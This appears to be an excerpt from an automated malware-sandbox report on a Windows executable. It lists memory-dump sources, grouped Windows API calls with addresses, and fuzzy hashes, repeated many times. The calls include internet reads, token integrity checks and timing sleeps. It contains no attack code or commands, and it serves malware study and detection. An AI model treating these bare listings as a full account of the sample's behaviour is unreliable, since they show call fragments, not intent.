• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00E9CC63,00000000), ref: 00E9D97D
• InternetReadFile.WININET(?,00000000,?,?), ref: 00E9D9B4
• GetLastError.KERNEL32(?,00000000,?,?,?,00E9CC63,00000000), ref: 00E9D9F9
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00E9CC63,00000000), ref: 00E9DA0D
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00E9CC63,00000000), ref: 00E9DA37
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: EventInternet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 3191363074-0
APIs
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EB61E4
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00EB623C
• _wcslen.LIBCMT ref: 00EB624E
• _wcslen.LIBCMT ref: 00EB6259
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00EB62B5
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: MessageSend$_wcslen
• String ID:
• API String ID: 763830540-0
APIs
• IsWindow.USER32(00000000), ref: 00EA13AE
• GetForegroundWindow.USER32 ref: 00EA13C5
• GetDC.USER32(00000000), ref: 00EA1401
• GetPixel.GDI32(00000000,?,00000003), ref: 00EA140D
• ReleaseDC.USER32(00000000,00000003), ref: 00EA1445
Memory Dump Source
• Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00E5D146
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E5D169
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E53B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E46A79,?,0000015D,?,?,?,?,00E485B0,000000FF,00000000,?,?), ref: 00E53BC5
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E5D18F
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5D1A2
                                                                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E5D1B1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(0000000A,?,?,00E4F64E,00E4545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00E53170
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E531A5
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E531CC
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00E531D9
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00E531E2
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?,?,?,00E80C4E), ref: 00E8091B
                                                                                                                                                                                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?,?), ref: 00E80936
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?,?), ref: 00E80944
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?), ref: 00E80954
                                                                                                                                                                                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E80831,80070057,?,?), ref: 00E80960
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00E8F2AE
                                                                                                                                                                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 00E8F2BC
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00E8F2C4
                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00E8F2CE
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 00E8F30A
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E81A60
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A6C
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A7B
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E814E7,?,?,?), ref: 00E81A82
                                                                                                                                                                                                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E81A99
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E81976
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E81982
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E81991
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E81998
                                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E819AE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E81916
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E81922
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E81931
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E81938
                                                                                                                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E8194E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00E90B24,?,00E93D41,?,00000001,00E63AF4,?), ref: 00E90CCB
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00E90B24,?,00E93D41,?,00000001,00E63AF4,?), ref: 00E90CD8
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00E90B24,?,00E93D41,?,00000001,00E63AF4,?), ref: 00E90CE5
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00E90B24,?,00E93D41,?,00000001,00E63AF4,?), ref: 00E90CF2
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00E90B24,?,00E93D41,?,00000001,00E63AF4,?), ref: 00E90CFF
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00E90B24,?,00E93D41,?,00000001,00E63AF4,?), ref: 00E90D0C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 70ff8d66ed887093345d3f34d9cfe66a6937f3b65623f75d8c5f6a637af0958c
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0b84cfd40adb3db948032822333cd99caa9ed6a7936386bb56f1e4ad9f2d961b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70ff8d66ed887093345d3f34d9cfe66a6937f3b65623f75d8c5f6a637af0958c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED01AE71800B15DFCB30AFA6D980816FBF9BF503193159A3ED19762931C7B0A988DF80
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00E865BF
                                                                                                                                                                                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E865D6
                                                                                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00E865EE
                                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 00E8660A
                                                                                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00E86624
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 37a714d10ebb73ef7bc33f211390cef8a7ad53452fb807da027436c25582a627
                                                                                                                                                                                                                                                                                                    • Instruction ID: 09b4386a9176fd00595a2aa7c454f79b238986f5c990ddbcce018418fa090fd5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37a714d10ebb73ef7bc33f211390cef8a7ad53452fb807da027436c25582a627
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F018630504304AFEB206F11DD4EF977BB8FB00705F001669A58B710E1FBF0AA488B50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5DAD2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E52D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E5DB51,00EF1DC4,00000000,00EF1DC4,00000000,?,00E5DB78,00EF1DC4,00000007,00EF1DC4,?,00E5DF75,00EF1DC4), ref: 00E52D4E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E52D38: GetLastError.KERNEL32(00EF1DC4,?,00E5DB51,00EF1DC4,00000000,00EF1DC4,00000000,?,00E5DB78,00EF1DC4,00000007,00EF1DC4,?,00E5DF75,00EF1DC4,00EF1DC4), ref: 00E52D60
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5DAE4
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5DAF6
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5DB08
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5DB1A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6236952b08006d9598fff1959ae1d3646bae30ea03a9b3c5977c398dcfe0257c
                                                                                                                                                                                                                                                                                                    • Instruction ID: 002fe9abe5aca74e115e7053ef917faa5ad84a8af58349307f1f41c56795fa3a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6236952b08006d9598fff1959ae1d3646bae30ea03a9b3c5977c398dcfe0257c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F03C3250C208AFC674EB59ECC1C1A73EDAB143127956C09F809FB501CA30FC888754
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E5262E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E52D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00E5DB51,00EF1DC4,00000000,00EF1DC4,00000000,?,00E5DB78,00EF1DC4,00000007,00EF1DC4,?,00E5DF75,00EF1DC4), ref: 00E52D4E
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E52D38: GetLastError.KERNEL32(00EF1DC4,?,00E5DB51,00EF1DC4,00000000,00EF1DC4,00000000,?,00E5DB78,00EF1DC4,00000007,00EF1DC4,?,00E5DF75,00EF1DC4,00EF1DC4), ref: 00E52D60
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E52640
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E52653
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E52664
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00E52675
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a33f93276bec8e36ca149abe947e42743f703dcfaee59a7bcff710a412ba518e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 605295c194ddc2a023fdc6db346442d591536cc1b8e4c266012c51befde49beb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a33f93276bec8e36ca149abe947e42743f703dcfaee59a7bcff710a412ba518e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43F030715065158F8601AF56EC4186837A4BF767527005D8EFA10B6374C731090DEFC8
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: __freea$_free
                                                                                                                                                                                                                                                                                                    • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                                    • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8454a9e3f693f9443c3405128c723d7040d88ae75dd5cbf16d7a960bcabfa20b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1e1b04911a3ba37b54de5c3cf2fab34e13eb5cee47c66a7d0dd4d81d39d4e1f8
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8454a9e3f693f9443c3405128c723d7040d88ae75dd5cbf16d7a960bcabfa20b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AFD12975900206DBCB249F68C8557FAB7B1FF05306F2869DAED02BB250D3759D88CB91
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E941FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00EA52EE,?,?,00000035,?), ref: 00E94229
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E941FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00EA52EE,?,?,00000035,?), ref: 00E94239
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00EA5419
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00EA550E
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00EA55CD
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                                                                                                                                                                                                                                    • String ID: bn
                                                                                                                                                                                                                                                                                                    • API String ID: 2854431205-2317007323
                                                                                                                                                                                                                                                                                                    • Opcode ID: 53af30183ce68579630476403c0664966c58d6d93d0e555282157c98d7b83c5d
                                                                                                                                                                                                                                                                                                    • Instruction ID: ee9fab79e869b354a220db622f5272761f7a8582874f3b84f70f940c37145fcc
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53af30183ce68579630476403c0664966c58d6d93d0e555282157c98d7b83c5d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17D12A71900249AFCB14DF94D891AEEBBB4FF48304F54516DE41ABB292DB31A98ACF50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00E2D253
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
